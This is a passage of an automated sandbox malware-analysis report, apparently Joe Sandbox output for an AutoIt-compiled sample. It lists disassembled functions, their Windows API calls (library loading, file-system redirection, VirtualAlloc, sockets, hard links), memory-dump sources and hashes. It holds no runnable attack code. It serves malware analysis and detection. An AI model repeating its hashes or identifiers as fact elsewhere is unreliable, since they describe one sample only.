                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __calloc_crt
                                                                                        • String ID: K$@BL
                                                                                        • API String ID: 3494438863-2209178351
                                                                                        • Opcode ID: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                        • Instruction ID: ecd99e2cd8c25bd978de89897c730db32a1f4afae71c84053b65a056749c41d4
                                                                                        • Opcode Fuzzy Hash: fc675e1694061d9c38afe518b907dae0cef97e15bff182515fce2e9d9647b47a
                                                                                        • Instruction Fuzzy Hash: 13F0A4713056318BE7A48F15BC51E9A6BD4EB40334F91006BE504CE280EB38B8818A9C
                                                                                        Function 00404C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404BD0,?,00404DEF,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404C11
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404C23
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                        • Instruction ID: 336b7b4d781913fc81d88f89c4603830af099844575e0fd289a57b9d24372fc6
                                                                                        • Opcode Fuzzy Hash: 405154c16e2ccef9ecdbf58c32324ea843781b108d72a9dad8986559099558a3
                                                                                        • Instruction Fuzzy Hash: 21D08C70500712CFD7206F70D90830BB6D5AF08352B118C3E9481D2690E6B8D8808728
                                                                                        Function 00404C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404B83,?), ref: 00404C44
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00404C56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                        • Instruction ID: 94e8dd0119df68c591ce1b6916bf7291aa534648892bae55459e1f5a441e7c38
                                                                                        • Opcode Fuzzy Hash: ede2280b6c29169b17772aa7acd9e81a2ae4f3a09695aed7be4b1fdaf97be5ce
                                                                                        • Instruction Fuzzy Hash: 05D0C270500713CFD7206F31C80830A72D4AF00351B218C3F9591D62A8E678D8C0C728
                                                                                        Function 00480DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00481039), ref: 00480DF5
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00480E07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                        • Instruction ID: d6bbf1028a7b4fc64c7871010167997e003500dc78b62918f38a53d73d50c6ba
                                                                                        • Opcode Fuzzy Hash: fae212b9462cf56759409cc1f58fb8eb23c0b65c0082e346e03b2c3ad688c6db
                                                                                        • Instruction Fuzzy Hash: ACD08231560322DFC320AF70C80838B72E4AF04342F208C3E9582C2250E6B8D8948B28
                                                                                        Function 004790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00478CF4,?,0048F910), ref: 004790EE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00479100
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                        • Instruction ID: 12f83e0466186043ebac617d8a25d984f844cdccf99b41ce397239b1d45cf92f
                                                                                        • Opcode Fuzzy Hash: f050257f1e698f793cf4ceeb70369fd3548485a42f655611e5c8aa441dfab454
                                                                                        • Instruction Fuzzy Hash: E6D0EC34510723DFD7209B35D81C64A76D4AF05751B51CC3E9485D6650E678D894C754
                                                                                        Function 00441714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                                                                        • Instruction ID: f51e3ac8fae6d8955d529539db48231027d4147bdd6b48c6978ef66e561906ab
                                                                                        • Opcode Fuzzy Hash: 4c24db5f6d1ae0e835b3c0d7d74f6f6d97c26fe48fb6e8bef9c505129785ad3d
                                                                                        • Instruction Fuzzy Hash: D2D01271844118FAD7109B9098898F9737CA708301F600563B512A2050E23E9BD6E62E
                                                                                        Function 0045717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                        • Instruction ID: 13cbbea2f029a5b6ef5998baa1d0dcecb81b6aaeffd6b1af622dda72ce090ed1
                                                                                        • Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
                                                                                        • Instruction Fuzzy Hash: B9C19C74A04216EFCB14CFA4D884AAEBBB5FF48311B1085A9EC05DB352D734ED85DB94
                                                                                        Function 0047E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E0BE
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0047E101
                                                                                          • Part of subcall function 0047D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0047E301
                                                                                        • _memmove.LIBCMT ref: 0047E314
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3659485706-0
                                                                                        • Opcode ID: a7ed02eeed9676c8fcd00d37da31e49e87575bae2c78420ee5dd29f87526a4dd
                                                                                        • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                                                                                        • Opcode Fuzzy Hash: a7ed02eeed9676c8fcd00d37da31e49e87575bae2c78420ee5dd29f87526a4dd
                                                                                        • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                                                                                        Function 00478093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 004780C3
                                                                                        • CoUninitialize.OLE32 ref: 004780CE
                                                                                          • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                        • VariantInit.OLEAUT32(?), ref: 004780D9
                                                                                        • VariantClear.OLEAUT32(?), ref: 004783AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        • Opcode ID: 0f625460e1d8066da09c67e41f27514c9fba90c2366d23154bb5826f9ef884b6
                                                                                        • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                                                                                        • Opcode Fuzzy Hash: 0f625460e1d8066da09c67e41f27514c9fba90c2366d23154bb5826f9ef884b6
                                                                                        • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                                                                                        Function 0045687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: 9292484c7ffc42eea317217bf5d4e68703bd19dcc1dd3ea756c411c8d1f4197a
                                                                                        • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                                                                                        • Opcode Fuzzy Hash: 9292484c7ffc42eea317217bf5d4e68703bd19dcc1dd3ea756c411c8d1f4197a
                                                                                        • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                                                                                        Function 004897F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(00CD3970,?), ref: 00489863
                                                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00489896
                                                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00489903
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        • Opcode ID: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                                                                        • Instruction ID: e3f881a7cdcc43810cee46c2a40b043201eea1d37e41385612dd6f56ef4f9ac2
                                                                                        • Opcode Fuzzy Hash: 64022f8d4441c5f1557efdd9fcc3a986e2e7d97cfab57cf70d5a2593d4a8891b
                                                                                        • Instruction Fuzzy Hash: 6B513E74A00609AFCB10EF54C884ABE7BB5FF45360F14866EF855AB3A0D734AD91CB94
                                                                                        Function 004769AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                                                        • String ID:
                                                                                        • API String ID: 2214342067-0
                                                                                        • Opcode ID: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                                        • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                                                                                        • Opcode Fuzzy Hash: 5f9ca6de3472ca1f7af679026d0f929c5a37830e5e67d00f46ee422ea10bce61
                                                                                        • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                                                                                        Function 0047641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                                                                                        • _strlen.LIBCMT ref: 004764D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID:
                                                                                        • API String ID: 4218353326-0
                                                                                        • Opcode ID: f92aa70265d8cfa8456904e3018b373e308ad2a6be4037779746b4cd516bab6c
                                                                                        • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                                                                                        • Opcode Fuzzy Hash: f92aa70265d8cfa8456904e3018b373e308ad2a6be4037779746b4cd516bab6c
                                                                                        • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                                                                                        Function 0046B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0046B89E
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0046B8C4
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0046B8E9
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0046B915
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        • Opcode ID: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                                                                        • Instruction ID: 5b86d2e11fb278bd4ab993ead48be06bf9d9dcf949e57147c6f090c5708de813
                                                                                        • Opcode Fuzzy Hash: 8c509dae0351cb0f1ead8c0d9691e3f66f8983daa8a4ab2c48e0df630e8b2899
                                                                                        • Instruction Fuzzy Hash: C441097A600610DFCB11EF15C444A59BBE1EF49314F05C0AAEC4AAB3A2DB38FD45CB99
                                                                                        Function 00488851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
